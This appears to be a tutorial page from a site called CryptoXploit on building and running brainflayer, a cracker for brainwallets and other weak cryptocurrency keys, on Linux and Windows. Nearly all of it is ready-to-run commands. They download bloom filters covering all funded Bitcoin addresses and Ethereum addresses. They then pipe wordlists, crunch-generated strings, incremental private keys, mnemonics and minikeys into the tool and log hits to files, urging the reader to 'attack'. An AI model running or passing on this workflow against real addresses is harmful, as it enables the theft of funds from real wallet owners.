A proof-of-concept cracker for cryptocurrency brainwallets and other low entropy key algorithms.it uses libsecp256k1 for pubkey generation.
Scan/Click QR to download
root@cryptoxploit:~# git clone https://github.com/CryptoXploit/brainflayer.git
root@cryptoxploit:~# cd brainflayer
root@cryptoxploit:~/brainflayer# chmod +x secp256k1/autogen.sh
root@cryptoxploit:~/brainflayer# make
root@cryptoxploit:~/brainflayer# ./brainflayer -h
According to Wikipedia, bloom filter is a space-efficient probabilistic data structure that is used to test whether an element exists in a set. False-positive matches are possible, but false negatives are not. In our case, there is a very small chance brainflayer that will return a cracked wallet that it is not actually cracked.
The next step is the creation of the bloom filter. A file which lists one bitcoin address per line is required. Then, addresses should be converted to Hash160 addresses. Finally, execute the following command :
root@cryptoxploit:~/brainflayer# ./hex2blf example.hex example.blf
For Ethereum bloom filter creation, no hash160 conversion is required.
After the bloom filter creation, everything is ready for brute-forcing. Grab your longest wordlist and attack! The following commands are the most common ones:
root@cryptoxploit:~/brainflayer# ./brainflayer -v -b example.blf -i crackstation.txt
root@cryptoxploit:~/brainflayer# ./brainflayer -t sha3 -v -b example.blf -i crackstation.txt
root@cryptoxploit:~/brainflayer# ./brainflayer -t bwio -v -b example.blf -i crackstation.txt
download all.blf(
root@cryptoxploit:~/brainflayer# wget https://www.cryptoxploit.com/download/brainflayer/all.blf.gz
root@cryptoxploit:~/brainflayer# gzip -dv all.blf.gz
root@cryptoxploit:~/brainflayer# ./brainflayer -v -b all.blf -i weakpass_3a
sha256 is the default option for bitcoins
root@cryptoxploit:~/brainflayer# wget https://www.cryptoxploit.com/download/brainflayer/ethereum.hex.gz
root@cryptoxploit:~/brainflayer# gzip -dv ethereum.hex.gz
root@cryptoxploit:~/brainflayer# ./hex2blf ethereum.hex ethereum.blf
root@cryptoxploit:~/brainflayer# ./brainflayer -t sha3 -c e -v -b ethereum.blf -i weakpass_3a
root@cryptoxploit:~/brainflayer# ./brainflayer -t keccak -c e -v -b ethereum.blf -i weakpass_3a
root@cryptoxploit:~/brainflayer# ./brainflayer -t sha256 -c e -v -b ethereum.blf -i weakpass_3a
Brainflayer supports cracking via incremental private keys with option -I . This method is extremely fast. A single modern core can scan more than 760000 p/s
root@cryptoxploit:~/brainflayer# ./brainflayer -c e -v -b ethereum.blf -I 0000000000000000000000000000000000000000000000000000000000000001
root@cryptoxploit:~/brainflayer# screen
root@cryptoxploit:~/brainflayer# ./brainflayer -v -n 1/2 -b all.blf -i weakpass_3a
Ctrl + A D to detach session
root@cryptoxploit:~/brainflayer# screen
root@cryptoxploit:~/brainflayer# ./brainflayer -v -n 2/2 -b all.blf -i weakpass_3a
Ctrl + A D to detach session
now we have running 2 screen sessions and to check the brainflayer processes we can use
root@cryptoxploit:~/brainflayer# ps -C brainflayer
Crunch is a wordlist generator where you can specify a standard character set or any set of characters to be used in generating the wordlists. The wordlists are created through combination and permutation of a set of characters. You can determine the amount of characters and list size.
This program supports numbers and symbols, upper and lower case characters separately and Unicode.
root@cryptoxploit:~# apt-get install crunch
root@cryptoxploit:~# cd brainflayer/
root@cryptoxploit:~/brainflayer#
root@cryptoxploit:~/brainflayer# crunch 1 64 abcdefghijklmopqrstuvwxyz | ./brainflayer -v -c cu -t priv -x -b all.blf -o hit.txt
this crunch command will generate 1 to 64 chars password strings based on a-z alphabets.
we can see that crunch will generate 2859 PB of data on-the-fly redirecting to the brainflayer so we dont need to create such a massive text file.
root@cryptoxploit:~/brainflayer# crunch 1 64 abcdefghijklmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890\!\@\#\$\%\^\&\*\(\)\-\_\+\=\~\’\[\]\{\}\:\;\<\>\,\.\?\/ | ./brainflayer -v -c cu -t priv -x -b all.blf -o hit.txt
this command will give warning related to unicode support so the brainflayer supports it choose yes to continue.this command will generate 1 to 64 chars length password strings based on lower case a-z,uppercase A-Z,digits 0-9,special unicode characters.around 3207 Petabytes of data would be redirected to the brainflayer tool on-the-fly.
Scan/Click QR to download
D:\Brainflayer(windows)>brainflayer.exe -h
D:\Brainflayer(windows)>hex2blf.exe example.hex example.blf
NOTE:if you are getting “failed to open bloom filter ‘all.blf’: Incorrect file size” error it means you have not created blf(bloom filter) file from hex.in windows its required for you to create hex2blf.the bloom file .blf would be around 2 GB in size on windows which is different than linux so they may or may not be cross compatible.
D:\Brainflayer(windows)>brainflayer.exe -v -b example.blf -i rockyoubig.txt
for crunch in windows we will use included crunch_win.exe
D:\Brainflayer(windows)>crunch_win.exe 1 64 abcdefghijklmopqrstuvwxyz | brainflayer.exe -v -c cu -t priv -x -b example.blf
D:\Brainflayer(windows)>hex2blf.exe 21.hex 21.blf
D:\Brainflayer(windows)>python3 puzzle.py 21 | brainflayer.exe -v -c c -b 21.blf -t priv -x -o output.txt
we can see that the brainflayer has hit the puzzle 21 so the tool is working properly
D:\Brainflayer(windows)>hex2blf.exe 66.hex 66.blf
D:\Brainflayer(windows)>python3 puzzle.py 66 | brainflayer.exe -v -c c -b 66.blf -t priv -x -o output.txt
D:\Brainflayer(windows)>python3 mnemonics.py 12 | brainflayer.exe -v -b example.blf -o output.txt
choose mnemonics 4/12/18/24 for redirecting into brainflayer
Running 4 words mnemonics scan on all Bitcoin funded addresses
D:\Brainflayer(windows)>python3 mnemonics.py 4 | brainflayer.exe -v -b all.blf -o output.txt
D:\Brainflayer(windows)>python3 minikey.py 22 | brainflayer.exe -v -b all.blf -o output.txt
it will generate minikeys on-the-fly and will redirect to brainflayer.